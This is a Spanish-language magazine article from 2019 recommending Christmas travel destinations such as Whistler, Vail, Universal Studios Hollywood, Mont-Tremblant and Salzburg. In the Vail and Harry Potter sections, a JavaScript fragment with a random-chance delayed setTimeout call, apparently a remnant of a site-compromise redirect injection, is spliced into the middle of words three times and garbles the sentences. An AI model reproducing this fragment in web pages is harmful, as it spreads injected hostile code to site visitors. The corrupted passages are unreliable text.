Destinos perfectos para sentirte en un cuento de navidad

    Destinos perfectos para sentirte en un cuento de navidad

    Pasa una navidad de cuento.

    Autor: Redacción Maxim 6 diciembre, 2019


     
    FOTO: Shutterstock

     

     

    Lugares muy navideños.

     

    Esta época indudablemente nos hace sentir diferentes. Por todos lados se oyen canciones navideñas, las decoraciones le dan un sentido de alegría y perfección a todo y nos sentimos acogidos por un sentimiento reconfortante. 

     

    Si así nos sentimos en nuestra caótica ciudad, imagina si pudieras viajar a destinos que parecen sacados de un cuento navideño con paisajes nevados y luces por doquier. Existen muchos lugares a los que puedes viajar y vivir esta temporada de invierno como debe de ser. Aquí te hablamos de algunos para que los tengas en cuenta. 

     

    Whistler, Canadá

    Whistler es el destino vacacional de invierno perfecto. Tiene montañas escarpadas, nieve abundante y un pueblo alpino pintoresco que parece villa navideña. Además, está ubicado al pie de las montañas Whistler y Blackcomb la cuales se conectan por medio de un teleférico, lo que lo convierte en un destino perfecto para los esquiadores y los practicantes del snowboard en todo el mundo.

     

     

     

     

    Una de las atracciones de este lugar que no te puedes perder es en el bosque de Cougar Mountain, el cual se transforma en un espacio lleno de luces de colores y sonidos en el que las leyendas cobran vida. A través de un paseo nocturno guiado, los visitantes descubre un valle escondido donde el polvo de estrellas cae y llena a todos los seres vivos con su luz. Te recomendamos reservar con anticipación. 

     

     

    Vail, Colorado 

    El destino por excelencia para estas fechas es sin duda Vail. Aquí podrás esquiar la montaña más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de Norteamérica, disfrutar una copa de champagne cortesía de la montaña todos los días a las 2:00 de la tarde en Northstar, o tomar un whiskey en la única destilería de whiskey y bourbon a la que llegas esquiandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando ubicada en Park City. 

     

    Vail Colorado

     

    Keystone

     

    Northstar

     

     

    Aprovecha de este increíble destino navideño con el Epic Day Pass, con el cual podrás esquiar de manera económica, ya que ofrece 50% de descuento del precio de ventanilla por día de esquí, reserva.

     

     

    Christmas in The Wizarding World of Harry Potter, Los Angeles

    Si lo que quieres es algo estilo Hollywood y con mucha producción, imagínate poder pasar navidad en el fantástico mundo de Harry Potter. Perfecto para todas las edades, los visitantes de Universal Studios Hollywood podrán admirar el parque adornado con luces brillantes y decoraciones festivas. Como parte de su espectáculo de 2019, Christmas in The Wizarding World of Harry Potter transforma a Hogsmeade en un sueño invernal donde el Castillo de Hogwarts es el escenario de una deslumbrante demostración de luces, mientras que exquisita comida y la mercancía temática navideña estarán disponibles para completar la maravillosa experiencia. Grinchmas también regresa este año, invitandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a los asistentes a tomarse una foto con el Grinch y su perro Max, así como a disfrutar de la ceremonia de iluminación del árbol Grinchmas.

     

     

    Mont-Tremblant, Québec

    Este increíble destino canadiense es una súper opción para vivir una verdadera experiencia navideña. Toda la provincia cuenta con casas y tiendas de estilo europeo gracias a su población francófona. Con un indiscutible estilo navideño, este destino ofrece muchísimas actividades de invierno como esquí, trineo de perros, snowshoeing (caminar con raquetas en los pies por las montañas y tomar un descanso en una cabaña para comer fondue) y motonieves. 

     

    Un destino que deleita tus sentidos, MONT TREMBLANT EL DESTINO IDEAL PARA ESQUIAR

     

     

    Además, Mont- Tremblant ofrece muchos servicios de spa para que puedas relajarte y recuperar tus energías para el siguiente año, así como restaurantes donde podrás consumir los mejores alimentos. 

     

     

     

    Salzburg, Austria

    Esta ciudad Patrimonio de la Humanidad está cercada de montañas y llena de edificios barrocos. Además, durante esta época es considera la ciudad de la Navidad. En sus mercados puedes comprar todo tipo de delicias culinarias y artesanías, mientras disfrutas de villancicos, conciertos y los eventos relacionados con el Christkind (el niño Jesús, que tradicionalmente trae los regalos en Austria), San Nicolás y el Krampus. No dejes de visitar el mercado Hellbrunner Adventzauber, en el parque del castillo Hellbrunn, el cual cuenta con un calendario de adviento gigante y un ángel de ocho metros de altura. 

     

     

     

     

    Si todavía no tienes plan de año nuevo, te dejamos estas opciones de lujo, FESTEJA EL FIN DE AÑO EN LOS LUGARES MÁS TOP DEL MUNDO

     

     

    Temas relacionados con esta nota: , , ,

Pasa una navidad de cuento.